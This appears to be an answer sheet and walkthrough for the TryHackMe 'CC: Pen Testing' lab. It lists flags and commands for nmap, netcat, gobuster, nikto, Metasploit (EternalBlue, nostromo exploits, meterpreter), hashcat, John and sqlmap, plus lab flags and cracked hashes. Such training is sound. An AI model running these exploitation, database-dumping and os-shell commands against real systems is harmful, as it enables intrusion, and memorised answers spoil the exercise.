-
Notifications
You must be signed in to change notification settings - Fork 0
/
CC: Pen Testing
478 lines (283 loc) · 10.5 KB
/
CC: Pen Testing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
#Task 2 [Section 1 - Network Utilities] - nmap
- What does nmap stand for?
Network Mapper
- How do you specify which port(s) to scan?
-p
- How do you do a "ping scan"(just tests if the host(s) is up)?
-sn
- What is the flag for a UDP scan?
-sU
- How do you run default scripts?
-sC
- How do you enable "aggressive mode"(Enables OS detection, version detection, script scanning, and traceroute)
-A
- What flag enables OS detection
-O
- How do you get the versions of services running on the target machine
-sV
- How many ports are open on the machine?
1
- What service is running on the machine?
Apache
- What is the version of the service?
2.4.18
- What is the output of the http-title script(included in default scripts)
Apache2 Ubuntu Default Page: It Works
#Task 3 [Section 1 - Network Utilities] - Netcat
- How do you listen for connections?
-l
- How do you enable verbose mode(allows you to see who connected to you)?
-v
- How do you specify a port to listen on
-p
- How do you specify which program to execute after you connect to a host(One of the most infamous)?
-e
- How do you connect to udp ports
-u
#Task 4 [Section 2 - Web Enumeration] - gobuster
- How do you specify directory/file brute forcing mode?
dir
- How do you specify dns bruteforcing mode?
dns
- What flag sets extensions to be used?
Example: if the php extension is set, and the word is "admin" then gobuster will test admin.php against the webserver
-x
- What flag sets a wordlist to be used?
-w
- How do you set the Username for basic authentication(If the directory requires a username/password)?
-U
- How do you set the password for basic authentication?
-P
- How do you set which status codes gobuster will interpret as valid?
Example: 200,400,404,204
-s
- How do you skip ssl certificate verification?
-k
- How do you specify a User-Agent?
-a
- How do you specify a HTTP header?
-H
- What flag sets the URL to bruteforce?
-u
- What is the name of the hidden directory
hint: gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
or ffuf -u http://10.10.186.153/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
secret
- What is the name of the hidden file with the extension xxa
hint: gobuster dir -u $IP -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt -x xxa
or ffuf -u http://10.10.186.153/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -e .xxa -mc 200
password
#Task 5 [Section 2 - Web Enumeration] - nikto
- How do you specify which host to use?
-h
- What flag disables ssl?
-nossl
- How do you force ssl?
-ssl
- How do you specify authentication(username + pass)?
-id
- How do you select which plugin to use?
-plugins
- Which plugin checks if you can enumerate apache users?
hint: nikto -list-plugins | grep apache
apacheusers
- How do you update the plugin list
-update
- How do you list all possible plugins to use
--list-plugins
# Task 7 [Section 3 Metasploit]: Setting Up
- What command allows you to search modules?
search
- How do you select a module?
use
- How do you display information about a specific module?
info
- How do you list options that you can set?
options
- What command lets you view advanced options for a specific module?
advanced
- How do you show options in a specific category
show
# Task 8 [Section 3 - Metasploit]: - Selecting a module
- How do you select the eternalblue module?
use exploit/windows/smb/ms17_010_eternalblue
- What option allows you to select the target host(s)?
RHOSTS
- How do you set the target port?
RPORT
- What command allows you to set options?
set
- How would you set SMBPass to "username"?
set SMBPass username
- How would you set the SMBUser to "password"?
set SMBUser password
- What option sets the architecture to be exploited?
arch
- What option sets the payload to be sent to the target machine?
payload
- Once you've finished setting all the required options, how do you run the exploit?
exploit
- What flag do you set if you want the exploit to run in the background?
-j
- How do you list all current sessions?
session
- What flag allows you to go into interactive mode with a session("drops you either into a meterpreter or regular shell")
-i
# Task 9 [Section 3 - Metasploit]: meterpreter
- What command allows you to download files from the machine?
download
- What command allows you to upload files to the machine?
upload
- How do you list all running processes?
ps
- How do you change processes on the victim host(Ideally it will allow you to change users and gain the perms associated with that user)
migrate
- What command lists files in the current directory on the remote machine?
ls
- How do you execute a command on the remote host?
execute
- What command starts an interactive shell on the remote host?
shell
- How do you find files on the target host(Similar function to the linux command "find")
search
- How do you get the output of a file on the remote host?
cat
- How do you put a meterpreter shell into "background mode"(allows you to run other msf modules while also keeping the meterpreter shell as a session)?
background
#Task 10 [Section 3 - Metasploit]: Final Walkthrough
- Select the module that needs to be exploited
use exploit/multi/http/nostromo_code_exec
- What variable do you need to set, to select the remote host
rhosts
- How do you set the port to 80
set rport 80
- How do you set listening address(Your machine)
lhost
- What is the name of the secret directory in the /var/nostromo/htdocs directory?
hint: show options
set lhost myip
set rhosts targetip
set uripath /var/nostromo/htdocs
run
s3cretd1r
- What are the contents of the file inside of the directory?
Woohoo!
#Task 13 [Section 4 - Hash Cracking]: hashcat
- What flag sets the mode.
hint: hashcat --help
-m
- What flag sets the "attack mode"
hint: hashcat --help | grep attack
-a
- What is the attack mode number for Brute-force
hint: hashcat --help | grep Brute
3
- What is the mode number for SHA3-512
hint: hashcat --help | grep SHA3-512
17600
- Crack This Hash:56ab24c15b72a457069c5ea42fcfc640
Type: MD5
hint: hashcat --force 56ab24c15b72a457069c5ea42fcfc640 -m 0 -a 3
happy
- Crack this hash: 4bc9ae2b9236c2ad02d81491dcb51d5f
Type: MD4
hint: hashcat --help | grep MD4
hashcat --force 4bc9ae2b9236c2ad02d81491dcb51d5f -m 900 -a 3
#Task 14 [Section 4 - Hash Cracking]: John The Ripper
- What flag let's you specify which wordlist to use?
hint: john --help | grep wordlist
--wordlist
- What flag lets you specify which hash format(Ex: MD5,SHA1 etc.) to use?
hint: john --help | grep format
--format
- How do you specify which rule to use?
hint: john --help | grep rule
--rule
- Crack this hash: 5d41402abc4b2a76b9719d911017c592
Type: MD5
hint: echo 5d41402abc4b2a76b9719d911017c592 > hash
john hash --wordlist=/home/gd/Download/rockyou.txt --format=raw-md5
john hash --show --format=raw-md5
hello
- Crack this hash: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
Type: SHA1
hint: echo 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 > hash2.txt
john hash2.txt --wordlist=/home/gd/Downloads/rockyou.txt --format=raw-sha1
john hash2.txt --show --format=raw-sha1
password
#Task 16 [Section 5 - SQL Injection]: sqlmap
- How do you specify which url to check?
hint: sqlmap --help | grep url
-u
- What about which google dork to use?
hint: sqlmap --help | grep dork
-g
- How do you select(lol) which parameter to use?(Example: in the url http://ex.com?test=1 the parameter would be test.)
-p
- What flag sets which database is in the target host's backend?(Example: If the flag is set to mysql then sqlmap will only test mysql injections).
--dbms
- How do you select the level of depth sqlmap should use(Higher = more accurate and more tests in general).
--level
- How do you dump the table entries of the database?
--dump
- Which flag sets which db to enumerate?
(Case sensitive)
-D
- Which flag sets which table to enumerate?
(Case sensitive)
-T
- Which flag sets which column to enumerate?
(Case sensitive)
- C
- How do you ask sqlmap to try to get an interactive os-shell?
--os-shell
- What flag dumps all data from every table
--dump-all
#Task 18 [Section 5 - SQL Injection]: Vulnerable Web Application
- How many types of sqli is the site vulnerable to?
hint:sqlmap -u http://$ip/ --method POST --data 'msg=noraj' -p msg
or dump all: sqlmap -u http://$IP --forms --dump
3
- What is the name of the database?
hint: sqlmap -u http://$IP/ --method POST --data 'msg=noraj' -p msg --dbms mysql --current-db
tests
- How many tables are in the database?
hint: sqlmap -u http://$IP/ --method POST --data 'msg=noraj' -p msg --dbms mysql --tables -D tests
2
- What is the value of the flag?
hint: sqlmap -u http://$IP/ --method POST --data 'msg=noraj' -p msg --dbms mysql --dump -D tests
found_me
#Task 24 [Section 7 - Final Exam]: Good Luck :D
- What is the user.txt
hint: nmap -sSCV -p- -vv --script=vuln -oA output.txt $IP
nikto -h $IP #best scan
.../secret
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir -u http://$IP/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
or gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -q /secret
or dirb http://10.10.114.27/secret /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -X .txt,.php,.html
other wordlist: dirb http://10.10.114.27/secret /usr/share/wordlists/dirb/common.txt -X .txt,.php,.html
or other tool:
ffuf -u http://10.10.196.95/FUZZ -c -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://10.10.196.95/secret/FUZZ -c -w /usr/share/wordlists/dirb/common.txt -e .txt -fc 403
gobuster dir -u http://10.10.196.95/secret -w /usr/share/wordlists/dirb/common.txt -x txt <--ok
dirb http://10.10.196.95/secret /usr/share/wordlists/dirb/common.txt -X .txt <--ok
http://10.10.114.27/secret/secret.txt
nyan:046385855FC9580393853D8E81F240B66FE9A7B8
vi hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1
nyan
cat user.txt
supernootnoot
- What is the root.txt
hint:ssh [email protected]
sudo -l
sudo su
cat /root/root.txt
congratulations!!!!
https://docplayer.net/198613531-Tryhackme-cc-pen-testing-completed-winter-2020.html
https://fieldraccoon.github.io/misc%20posts%20not%20released%20yet/priv-esc-pre-writeup/
https://tryhackme.com/room/ccpentesting
https://vicksecurity.com/tryhackme/cc-pentesting-tryhackme-writeup-walkthrough/
https://blog.raw.pm/en/TryHackMe-CC-Pen-Testing-write-up/